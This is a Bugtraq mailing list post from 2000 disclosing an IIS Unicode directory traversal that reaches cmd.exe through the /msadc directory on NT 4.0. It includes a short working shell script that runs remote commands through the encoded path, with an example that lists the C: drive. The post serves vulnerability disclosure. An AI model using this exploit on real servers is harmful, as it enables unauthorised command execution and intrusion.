Bugtraq mailing list archives
%c1%1c NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!
From: Marco <m.v.berkum () obit nl>
Date: Fri, 20 Oct 2000 22:56:08 +0200
Hi, A friend (Dimitri van de Giessen) called me after reading the article regarding this remote execution UNICODE style bug in the IIS webserver (supposedly >4.0) found by a anonymous packetstorm mailer and investigated by RFP. Again NT??!? Yes... again... I called in another friend (Kristian Vlaardingerbroek) to eat a lot and to help me find out this funny bug. We started investigating and after a while we found that rain forest puppy's string "%c1%af" worked on our english version of NT 4.0. Playing a bit, feeling tired, we found that you CAN get out of the document_root_drive to execute cmd.exe. Remember the msadc RDS "feature" ? Ok, so why not use /msadc ? Its a directory placed on the system drive and usually accessible through normal HTTP requests. Knowing this you would know that putting the website on a different drive than your systemdrive would not make a difference at all ;)_ You can put it on and Q:\> if you like, you're still possibly vulnerable. Imagine what you could do with this: ----blaat.sh---- #!/bin/sh lynx -dump http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7 -------------- ./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double backslash to escape it. And voila, a dir listing. It seems that every different language version of NT has different UNICODE chars, didnt find out other countries yet, will be easy to make in perl as RFP described (not going to give you source code either ;-)). Most probably sample files like pagevieuw and codebrws.asp, other iis samples and other "features" like msadc, webhits, newdsn and +.htr (%2B) get interesting AGAIN when placed on other dirs vieuwable by the dir c:\\anything command. Get blisters patching your NT. Now you can execute commands, welcome to amazing wold of Microsoft(TM). Cheers, Marco van Berkum, Dimitri van de Giessen, Kristian Vlaardingerbroek. Marco - www.obit.nl (marco () obit nl) http://www.britney.com Dimitri - www.IS-Watch.nl (info () IS-Watch nl) http://www.is-watch.nl/microsoft.jpg ;) Kristian - www.obit.nl (kris () obit nl) http://www.slashdot.org
Current thread:
- %c1%1c NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE! Marco (Oct 24)